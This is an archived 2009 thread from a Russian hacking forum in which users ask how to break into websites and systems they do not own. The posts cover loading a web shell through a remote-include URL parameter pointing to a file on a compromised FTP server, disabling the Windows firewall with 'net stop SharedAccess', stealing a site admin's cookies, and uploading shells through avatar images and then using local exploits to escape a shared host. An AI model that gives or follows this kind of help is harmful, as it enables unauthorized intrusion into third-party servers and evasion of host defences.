ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

07.02.2009, 18:57
|
|
Новичок
Регистрация: 31.10.2008
Сообщений: 15
Провел на форуме: 48847
Репутация:
1
|
|
мухаха, изменение регистра помогло
двиг там походу самопальный, и он не вырезает, а заменяет на **caractères interdits**, это по-французски 
|
|
|

07.02.2009, 20:40
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме: 584540
Репутация:
96
|
|
Помогите разобраться с пхп инъекциями плз 
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел 
Подскажите пожалуйста решение)
|
|
|

07.02.2009, 20:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
Сообщение от $p01nt
Помогите разобраться с пхп инъекциями плз 
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел 
Подскажите пожалуйста решение)
скорее всего это просто iframe. никакой инъекции тут нет.
|
|
|

07.02.2009, 22:50
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме: 63941
Репутация:
2
|
|
Народ, подскажите пожалуйста как отрубить microsoft firewall?
- после выполнения комманды net stop - винда уходит в ребут. При выполнении sc config просит пароль. Может есть кака-либо народная хитрость? )))
|
|
|

08.02.2009, 01:42
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
net stop - мало, надо:net stop SharedAccess
или В реестре поставь тип запуска отключен и перебутай винду =)
|
|
|

08.02.2009, 02:09
|
|
Познающий
Регистрация: 05.06.2008
Сообщений: 30
Провел на форуме: 117058
Репутация:
20
|
|
В общем нужно сламать или получить акк админа.Я отсканировал иксспайдеров и вот мне тут написало:
Доступна информация
Список cookie
Описание
1. PHPSESSID=l75f8joisi24poei8f3088q4l5; path=/
2. popup_showed=deleted; expires=Fri, 08-Feb-2008 21:42:33 GMT; path=/; domain=.gta-mp.ru; HttpOnly
Возможно ли получить куки админа? 
|
|
|

08.02.2009, 02:31
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
нет
|
|
|

08.02.2009, 02:32
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
это куки которые тебе сервер на компе оставил. используя эту инфу нельзя получить куки админа.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|

08.02.2009, 05:40
|
|
Новичок
Регистрация: 02.04.2007
Сообщений: 12
Провел на форуме: 105055
Репутация:
7
|
|
1. Расскажите пожалуйста реально ли сейчас залить шелл через аватарку? Работает ли способ внедрения своего кода в картинку?
2. Есть 2 шелла на 2 серваках, выход на другие сайты закрыт. Тобишь папки других юзеров посмотреть не могу. Есть ли способы как то проникнуть в другие папки?
|
|
|

08.02.2009, 07:51
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
1. Реально, работает. нужен инклуд или необходимые анстройки сервера (к примеру через .htaccess)
2. Просто тупо прав не хватает. Ищи локальный сплойт под ОСь или под что-нить другой, что на сервере (например мод апача какой-нить бажный)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|